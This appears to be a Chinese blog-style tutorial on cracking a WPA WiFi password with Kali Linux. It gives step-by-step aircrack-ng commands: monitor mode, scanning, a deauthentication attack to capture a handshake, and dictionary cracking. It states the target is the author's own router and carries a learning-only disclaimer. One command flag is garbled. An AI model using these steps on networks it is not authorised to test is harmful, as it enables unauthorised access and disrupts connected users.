WIFI破解前准备工作
- 一张支持Kali系统监听的无线网卡
- VMware虚拟机安装好Kali系统(本实验用的是Kali 2022版本)
Kali系统下载、安装
官方网站:
https://www.kali.org/get-kali/#kali-installer-images
清华大学镜像站:
https://mirrors.tuna.tsinghua.edu.cn/kali-images/kali-2022.3
这里推荐清华大学镜像站下载,下载速度比较快,根据自己系统下载对应版本即可,具体安装教程可自行百度:
一、无线网卡安装
无线网卡淘宝购买即可:搜索Kali无线网卡,价格20-50元不等。购买前咨询客服需要支持Kali系统的。将买回来的网卡插到PC的USB接口上,正常情况下虚拟机会识别无线网卡,在VMware虚拟机上查看是否识别到无线网卡,如果没有显示网卡,可尝试重新拔插无线网卡,还是不行则需要联系卖家客服了。
进入到Kali系统,打开命令行终端,提升账号权限
sudo su
查看网卡是否安装成功
airmon-ng
如果没有显示插入的无线网卡,请检查无线网卡的连接是否正常!
二、启动网卡监听模式
airmon-ng start wlan0
查看当前无线网卡的监听模式是否正常开启,网卡名称变为网卡名 mon说明监听正常
ifconfig
三、扫描WIFI
这里我选择自己的WIFI路由器进行破解,密码是手机号码
airodump-ng wlan0mon
四、等待抓取握手包
airodump-ng -w freedom -c 6 --bssid 28:D1:27:8C:C9:C5 wlan0mon -ignore-nefative-oneaa
参数说明:
# -c:指定信道
# -w:指定抓去握手包的存放位置或者名字,freedom是一会抓去的握手包的名字
# –bssid:指定路由器的MAC
执行完该指令,会显示当前路由器正在连接的设备,需要选择其中一个设备捕获握手包
五、开始抓取握手包
打开另一个终端,选择其中一个设备捕获握手包,有时可能捕获不成功,可多次执行以下命令,确保能捕获到握手包
sudo su
aireplay-ng -0 2 -a 28:D1:27:8C:C9:C5 -c A4:55:90:90:DB:B1 wlan0mon
再查看第一个终端的状态,如果显示WPA handshake表明已经捕获到握手包了,需要按Ctrl C终止,终止后,会生成freedom-*.ivs的文件
六、破解密码
准备好破解的字典
字典其实是一个普通的文本文档txt文件,里面存在着各种密码,每个密码用回车换行区分,破解程序在破解时会根据握手包的数据,与字典的每一个密码一一匹配,如果匹配得上,则密码可破解成功。
开始破解
aircrack-ng -w WIFI-Dict-955M.txt freedom-*.ivs
由于我使用的字典比较大,将近1GB的大小,破解需要很长的时间,为方便测试,可以自己新建一个测试的字典txt文件,里面填写一个正确的WIFI密码(前提是破解自己的WIFI),这样即可很快、顺利地破解。
七、密码破解结果
WIFI-Dict-955M.txt这个字典跑了几个小时也没跑出来,这个字典不太行,我应该找个纯数字或手机号码的字典来跑。。。我换了一个自己测试写的字典,把WIFI密码填进去,不到1秒就出来了
破解成功,KEY FOUND!后面的就是WIFI的密码
总结
- WIFI密码不是百分百能破解成功的!
- WIFI密码能否破解成功,取决于密码字典是否足够强大,如果字典没有匹配的密码,无法破解成功
- WIFI密码的破解效率取决于字典的大小、机器性能、WIFI密码的复杂度等,字典越大,破解过程越久;机器性能强、WIFI密码简单则破解过程会快些。
提醒:本教程仅供网络安全学习用途,不得用于对他人网络设备攻击、破解、商业利用等。
,